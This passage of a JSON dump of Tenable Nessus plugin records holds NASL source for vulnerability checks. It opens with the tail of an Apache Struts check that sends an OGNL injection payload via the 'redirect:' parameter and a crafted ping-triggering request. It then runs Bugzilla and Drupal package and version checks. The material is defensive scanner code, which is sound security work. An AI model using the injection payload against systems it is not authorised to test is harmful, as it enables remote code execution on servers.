attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n '\\n';\n\n s = send_capture(socket:soc,data:req,pcap_filter:filter);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = req;\n break;\n }\n }\n}\n\n# and finally, we try a simple injection of an ognl add.\nif(!vuln)\n{\n foreach url (urls)\n { \n payload_ognl_add = \"?redirect:%24%7B57550614%2b16044095%7D\";\n payload_redirect_verify_regex = \"Location: .*73594709\";\n \n attack_url = url + payload_ognl_add;\n\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE,\n follow_redirect: 0\n );\n\n if (res[1] =~ payload_redirect_verify_regex)\n {\n vuln = TRUE;\n vuln_url = attack_url;\n break;\n }\n\n # Stop after first vulnerable Struts app is found\n if (vuln) break;\n }\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(build_url(qs:vuln_url, port:port)),\n output : chomp(res[2])\n);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:33:37", "references": ["https://bugzilla.mozilla.org/show_bug.cgi?id=713926", "http://www.nessus.org/u?05b01261"], "pluginID": "73632", "description": "A Bugzilla Security Advisory reports : The login form had no CSRF protection, meaning that an attacker could force the victim to log in using the attacker's credentials. If the victim then reports a new security sensitive bug, the attacker would get immediate access to this bug.\n\nDue to changes involved in the Bugzilla API, this fix is not backported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12 and older, and 4.2.8 and older, will remain vulnerable to this issue.", "edition": 4, "reporter": "Tenable", "published": "2014-04-21T00:00:00", "title": "FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2014-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:bugzilla44", "p-cpe:/a:freebsd:freebsd:bugzilla42", "p-cpe:/a:freebsd:freebsd:bugzilla40"], "id": "FREEBSD_PKG_608ED765C70011E3848C20CF30E32F6D.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2014 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73632);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2014/04/23 12:45:52 $\");\n\n script_cve_id(\"CVE-2014-1517\");\n\n script_name(english:\"FreeBSD : bugzilla -- Cross-Site Request Forgery (608ed765-c700-11e3-848c-20cf30e32f6d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Bugzilla Security Advisory reports : The login form had no CSRF\nprotection, meaning that an attacker could force the victim to log in\nusing the attacker's credentials. If the victim then reports a new\nsecurity sensitive bug, the attacker would get immediate access to\nthis bug.\n\nDue to changes involved in the Bugzilla API, this fix is not\nbackported to the 4.0 and 4.2 branches, meaning that Bugzilla 4.0.12\nand older, and 4.2.8 and older, will remain vulnerable to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=713926\"\n );\n # http://www.freebsd.org/ports/portaudit/608ed765-c700-11e3-848c-20cf30e32f6d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05b01261\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla40\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla42\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:bugzilla44\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla40>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla42>=2.0.0<4.4.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"bugzilla44>=2.0.0<4.4.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-02T00:00:21", "references": ["http://www.nessus.org/u?b6e314a9", "http://www.bugzilla.org/security/4.0.11/"], "pluginID": "73778", "description": "Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an attacker could force the victim to log in using the attacker's credentials.\n\n - Dangerous control characters can be inserted into Bugzilla, notably into bug comments, which can then be used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see http://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug commenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2014-04-30T00:00:00", "title": "Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2015-10-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:bugzilla"], "id": "FEDORA_2014-5433.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73778", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5433.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73778);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:18 $\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n script_xref(name:\"FEDORA\", value:\"2014-5433\");\n\n script_name(english:\"Fedora 20 : bugzilla-4.2.9-1.fc20 (2014-5433)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bugzilla.org/security/4.0.11/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b6e314a9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bugzilla package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bugzilla-4.2.9-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bugzilla\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:43:48", "references": ["http://www.bugzilla.org/security/4.0.11/", "http://www.nessus.org/u?6290efd1"], "pluginID": "73777", "description": "Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an attacker could force the victim to log in using the attacker's credentials.\n\n - Dangerous control characters can be inserted into Bugzilla, notably into bug comments, which can then be used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see http://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug commenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2014-04-30T00:00:00", "title": "Fedora 19 : bugzilla-4.2.9-1.fc19 (2014-5414)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2015-10-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:bugzilla"], "id": "FEDORA_2014-5414.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73777", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5414.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73777);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:18 $\");\n\n script_cve_id(\"CVE-2014-1517\");\n script_bugtraq_id(66984);\n script_xref(name:\"FEDORA\", value:\"2014-5414\");\n\n script_name(english:\"Fedora 19 : bugzilla-4.2.9-1.fc19 (2014-5414)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Previous versions of bugzilla had the following security issues :\n\n - The login form had no CSRF protection, meaning that an\n attacker could force the victim to log in using the\n attacker's credentials.\n\n - Dangerous control characters can be inserted into\n Bugzilla, notably into bug comments, which can then be\n used to execute local commands.\n\nThe first issue has the CVE number CVE-2014-1517. Please see\nhttp://www.bugzilla.org/security/4.0.11/ for all the gory details.\n\nBoth issues were fixed in 4.2.8 but it introduced a regression in bug\ncommenting that was fixed in 4.2.9.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.bugzilla.org/security/4.0.11/\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6290efd1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bugzilla package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bugzilla-4.2.9-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bugzilla\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:37:29", "references": ["https://packages.debian.org/source/wheezy/drupal7", "https://drupal.org/SA-CORE-2014-002", "http://www.debian.org/security/2014/dsa-2913"], "pluginID": "73714", "description": "An information disclosure vulnerability was discovered in Drupal, a fully-featured content management framework. When pages are cached for anonymous users, form state may leak between anonymous users.\nSensitive or private information recorded for one anonymous user could thus be disclosed to other users interacting with the same form at the same time.\n\nThis security update introduces small API changes, see the upstream advisory at drupal.org/SA-CORE-2014-002 for further information.", "edition": 4, "reporter": "Tenable", "published": "2014-04-27T00:00:00", "title": "Debian DSA-2913-1 : drupal7 - security update", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2015-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:drupal7", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2913.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73714", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2913. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73714);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/02/16 15:43:11 $\");\n\n script_cve_id(\"CVE-2014-2983\");\n script_bugtraq_id(66977);\n script_xref(name:\"DSA\", value:\"2913\");\n\n script_name(english:\"Debian DSA-2913-1 : drupal7 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users.\nSensitive or private information recorded for one anonymous user could\nthus be disclosed to other users interacting with the same form at the\nsame time.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 for further information.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://drupal.org/SA-CORE-2014-002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/drupal7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2014/dsa-2913\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the drupal7 packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"drupal7\", reference:\"7.14-2+deb7u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:43:57", "references": ["https://www.drupal.org/SA-CORE-2014-002", "https://www.drupal.org/drupal-6.31-release-notes"], "pluginID": "73634", "description": "The remote web server is running a version of Drupal that is 6.x prior to 6.31. It is, therefore, affected by an error related to the HTML form API and the caching of pages for different anonymous users, which could allow sensitive information to be disclosed. Note that Drupal core does not expose any such HTML forms by default.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 6, "reporter": "Tenable", "published": "2014-04-21T00:00:00", "title": "Drupal 6.x < 6.31 Forms API Information Disclosure", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2018-06-13T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_6_31.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=73634", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73634);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-2014-2983\");\n script_bugtraq_id(66977);\n\n script_name(english:\"Drupal 6.x < 6.31 Forms API Information Disclosure\");\n script_summary(english:\"Checks the version of Drupal.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is running a PHP application that is affected by\nan information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server is running a version of Drupal that is 6.x prior\nto 6.31. It is, therefore, affected by an error related to the HTML\nform API and the caching of pages for different anonymous users, which\ncould allow sensitive information to be disclosed. Note that Drupal\ncore does not expose any such HTML forms by default.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2014-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/drupal-6.31-release-notes\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 6.31 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:drupal:drupal\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"drupal_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/Drupal\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Drupal\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_single_install(\n app_name : app,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install['path'];\nversion = install['version'];\nurl = build_url(qs:dir, port:port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nfix = '6.31';\nif (version =~ \"^6\\.([0-9]|[12][0-9]|30)($|[^0-9]+)\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url, version);\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:34:03", "references": ["https://www.drupal.org/SA-CORE-2014-002", "https://www.drupal.org/drupal-7.27-release-notes"], "pluginID": "73635", "description": "The remote web server is running a version of Drupal that is 7.x prior to 7.27. It is, therefore, affected by an error related to the HTML form API and the caching of pages for different anonymous users, which could allow sensitive information to be disclosed. Note that Drupal core does not expose any such HTML forms by default.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "edition": 6, "reporter": "Tenable", "published": "2014-04-21T00:00:00", "title": "Drupal 7.x < 7.27 Forms API Information Disclosure", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2018-06-13T00:00:00", 